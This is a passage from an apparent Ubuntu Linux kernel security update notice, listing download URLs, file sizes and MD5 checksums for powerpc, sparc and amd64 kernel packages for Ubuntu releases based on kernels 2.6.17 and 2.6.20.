  Size/MD5:     2326 f417648675e7acfa5867ee8958495a2b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:     2512 2bdc4d135a4b6ab0b7454033c56e81d6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    39146 36c6d844177651c98a32a1f4de9bac47
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    43160 5cccb4d4c7a365b06ec59d94c5096b7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   111460 637701f6b21946824edc42e6a6b3566e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   122264 bec36c6b8274b8afd9d720999bc1c699
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    40398 0499fd639f86c20d0a7e60be731ff9f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    46876 be7dabfbcb0a7566e3080c3772462fd8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    28058 88db7067a260a6a08512198011679271
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    29044 f4a7eddc497b03169a44c72cf182e97a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   209728 c4f462d5a06674e080e992e32f4d6cea
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   225678 ee2a0e3c443723a0ce97d8e970090f84
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    44592 f88f56ae03ae05cb79f0319eb1be4fc9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    40180 026063484d20bbe1fbd0d30fc777b102
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:     1960 ce37409736c072d6859020537f966bbb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fs-common-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:     2232 444d141dbf7a0be30f683008105e2454
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    79296 6202508d92e6f97f32da0d7e8f8ccb3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/hfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    86610 2c60ff37a8a70308a2a9498bc561d3af
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   110266 9be5a8cdfbc2a405112322faf498dc9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   127800 5132a88c4c447ff1fb9638e836b11010
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    55672 57b5ce26bba975e81280cb4c8ab7b76a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    61918 54a57f37db597427da88933efbfd8dc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   141126 2eee122e08fd74b2c97f5c84ab34c5e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   158554 c88ff46534673a44bf0a44cb01ab8db3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   314558 f849928c8ea52842ede21b5923e4a84c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   289932 24b2c911aba6aa8d0b519e3a71344e6f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   113202 a126ad5886c8950e1770e9cd985ba147
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   116438 16d3713f122c112c3804a247e55c84d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:  2052254 d7284aec42efb2b79d629aae36f85b95
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:  2771922 717405adf1c494b10f007552ed3def99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc-smp_2.6.17.1-12.41_powerpc.deb
  Size/MD5:   912460 927a75696a3c9731b40dcca42d1b1b49
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc64-smp_2.6.17.1-12.41_powerpc.deb
  Size/MD5:   915104 b7e1aae5fdf896de9b00ffddba73d6ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-powerpc_2.6.17.1-12.41_powerpc.deb
  Size/MD5:   913878 d66779cfc21da3725638489f295481da
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.41_powerpc.deb
  Size/MD5:  7445508 83b0a2ec311bffc76c0c1f364c74f0ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc-smp_2.6.17.1-12.41_powerpc.deb
  Size/MD5: 22721046 a3b7652ca9a89e64b17bc2b7aba45b74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc64-smp_2.6.17.1-12.41_powerpc.deb
  Size/MD5: 24606868 0d76b8ed91944300c917b835d79c47ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-powerpc_2.6.17.1-12.41_powerpc.deb
  Size/MD5: 22428258 74495ae230394d9d39fca39f7ef71967
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc-smp_2.6.17.1-12.41_powerpc.deb
  Size/MD5:  2043316 f88b494bb78dad7ec7fd38038e9429a0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc64-smp_2.6.17.1-12.41_powerpc.deb
  Size/MD5:  2590132 f5a564fba2ed0cadaad735691681f13f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-powerpc_2.6.17.1-12.41_powerpc.deb
  Size/MD5:  1969568 2d93ed6141d44cc0a13b3530828fc8f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.41_powerpc.deb
  Size/MD5:  1730182 f90e7c905770310ff4bf91369eff5fbb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    17430 ba9deca2f2c5bc6af6922edfa3a46936
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    17362 0be7fc3d49f8003e5c1fa653d1161cb1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   258074 571823d4d6a5a59bccdec424b1a79e74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   297936 a1671c84513f9ff6c9bfec5a77516659
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   239038 7815ea92646f396243d8ddee08603f0d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   266530 e6e7d4fb571dc185f81b2d8750347fc5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:  1048482 32c385975d75dbc9881f2588eb4f83f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:  1048610 e74f5458086998989e79cc13eca6f466
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:  2098450 80794ad9682a8e960e65a65fe211069f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:  2331916 11f129cf828165f4b8653e2f6c041d0a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   233866 14d512283e6cac9b56106e3253712ebd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   214710 2ae3df298309c615f4cbb9b0c313056b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    12694 8d68131af0ff7b1265b116ab1abb69db
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    13316 b38627dc99b26991cfb411f010f95ca2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    83240 a5efba2fcc50681555c30b1358a0813b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    97176 14b1ee6592d0b2037ccfac07e1fca4e1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    71166 8aad18eeeec75a9fc1c14e3d764dbdfb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    84196 d90f611dc950e62436bb5465867302ec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:     6348 217f6e379d7ef92f881460d04b9ae10e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:     6880 008d2e8bc16a6f3b56f47a70c2dd7c8f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    57004 e1448478824a5a6c01e0c4b51e163659
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    69202 197a76821fd4d7c0f97ba60131c20677
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   128614 c0a55e944a2493c00b7a1c2c3dc9aaed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   156242 fe908c53d51b221aef61870a5f479d0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   109768 bc43c9322049dfc8bc15af006551baff
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   133044 7d49815adeecf9ca01b9821d86970335
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    86622 421ac3dc23e77ba944dc70175b8d2b55
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    94816 d2db47cfd8b715c3691099450a33411c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:  1511576 521fd9a273bd7f525ad183e587387ee5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:  1521686 284733f627766c212367d3d7aae43d4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   101308 ceffff4737228e697b3e8c18a37b908a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   115550 a632cbed2c861fc432c4550ad4aff373
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    12198 8dc73bf06c095d525f3c955ca00cd1f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    14284 a1f89acfdbb4cab89652478887aa18d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    84666 9cef62054edddca2128fddabd5f5077f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    87954 9dcd7c6d8265dee5919b110870eb0cd6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    37284 d67d4df023d3c5d683440fadaab1ee9a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    40252 fe638331efa7cb659b60b9de39019291
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   140002 d27a0c7d623c67241b1b58c6ab1cf267
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   161498 653ef8786d0330bdbf47d0b8d7b2f1f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    49992 e4cf0544fe424b61fdfdbddc43f17fee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    54866 f34dfa0f96aff8902a3ac104a4f904e2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   308222 644d7e2d9b7cddcfc725bb7198d40367
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:   330220 d6e6e30350819826f543b35c43ebb79c

sparc architecture (Sun SPARC/UltraSPARC):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:    50722 25643d1adb4dd6f860d836852fb30a64
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:     2388 73fce6a2d5a167901d758eb79ab19de2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:    40666 2ddd42df519917694783f3331845b06b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:   112216 ed1d7424f8eda91a24c8f6a21310ae56
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:    41748 3bb8746e309a474d319b43064eeb19d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:   105100 7828fa5edaedfea3c3ea817196d8bb11
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:     6860 9b2747d379625a26fa7c7b9fbe79858e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:   147574 0914e75619fedf4477f90610029aa592
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:  1840680 cd1c63ff8e8686beb478b9492d0dbdb5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64-smp_2.6.17.1-12.41_sparc.deb
  Size/MD5:   808630 8becdc1b19ab796fb770c747bc7ea9eb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-sparc64_2.6.17.1-12.41_sparc.deb
  Size/MD5:   806528 8bb4779b4e8975fae3d2741992cb1539
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.41_sparc.deb
  Size/MD5:  7424836 5ba8a5585029e847eca4be52d789b91f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64-smp_2.6.17.1-12.41_sparc.deb
  Size/MD5: 15628650 e249d211bfcc2561e00d746717899c78
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-sparc64_2.6.17.1-12.41_sparc.deb
  Size/MD5: 15289880 a3d84efcd51a5c15be9258187cc5bfe5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64-smp_2.6.17.1-12.41_sparc.deb
  Size/MD5:  2172656 dcc0f79fa168ea68ffc61a9a49acaf0b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-sparc64_2.6.17.1-12.41_sparc.deb
  Size/MD5:  2086564 75b33d70e4fc138a8de0ffe2fad093a8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.41_sparc.deb
  Size/MD5:  1813464 a727069987de8388404ab155492ce68a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:     7400 10af53789fcb4047abc533fe980f8387
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:   263978 2017f5523e1cb92d41e45ecec5355079
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:   229200 ac4a91fd864a51da81b2049bb79f9171
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:  1048438 10d391b17cea2f7d8f031672f5fe0df0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:  1921954 11c18c31b7004fbddb995068e673fd4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:     9910 0f91d879eda7a5e24531c8f749187164
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:    40352 29678c338db4eea37bc72163c5c27b3a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:     8718 a37ffd230a9981ab0c346401ebc30482
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:    59380 f751c8373f59c58c280d94fa86c2b828
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:   162876 389dca490f28b7f7ad9f19ded7665cd4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:    66648 a454526e3ef39da43045cd246d18d39b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:   855794 e756d9e85366386c4cb3ee0b075f5d37
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:    51820 0b5fce077f8d2e5970c2679236dc3dd7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:    38420 8f97a23ee87c907479cb19e471916005
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb
  Size/MD5:   283100 60d3a89b47183f645b78b5d1107c7b5b

Updated packages for Ubuntu 7.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.32.diff.gz
  Size/MD5:  1565964 dbaf53a99adc1e8785da9cbb150801e7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.32.dsc
  Size/MD5:     2472 47dfc615dfa2e15eb5094617bcb4767e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20.orig.tar.gz
  Size/MD5: 62174876 f19203b2488d943a640abe8f3cd20f57

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-doc-2.6.20_2.6.20-16.32_all.deb
  Size/MD5:  4877398 8cfc2d5cbdd951ffd2fa434843b4bf36
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-16.32_all.deb
  Size/MD5:    85092 ccf3b4417e99e717fa7839c1de6b3f87
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.32_all.deb
  Size/MD5: 47820380 fd6f9228289f46c0d337f3ad59fe15ab

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    24492 7bbb6a157c8b4b5f0910a867d8fb6b19
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   202074 eb887321018340c061e7291a6f62be38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    39344 4ca53051f5f5ae6de5839ce1297207f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    50908 7edbd05d91a90394fc4c2ca0cdfc7c22
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   187504 117c8ddfc16ac2313b2408d501c8f434
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    34906 a38df2ab16b4f13086ea0591f8d35438
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   644406 6e33794af6da6f574a383552e9e897d0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   174680 7a67c1e442d86bd89fa584f2430623e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    76422 a2687f1428a494398be728161f3d6470
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    57878 12916742f585fc6f8b92cd6dd94e1fd4
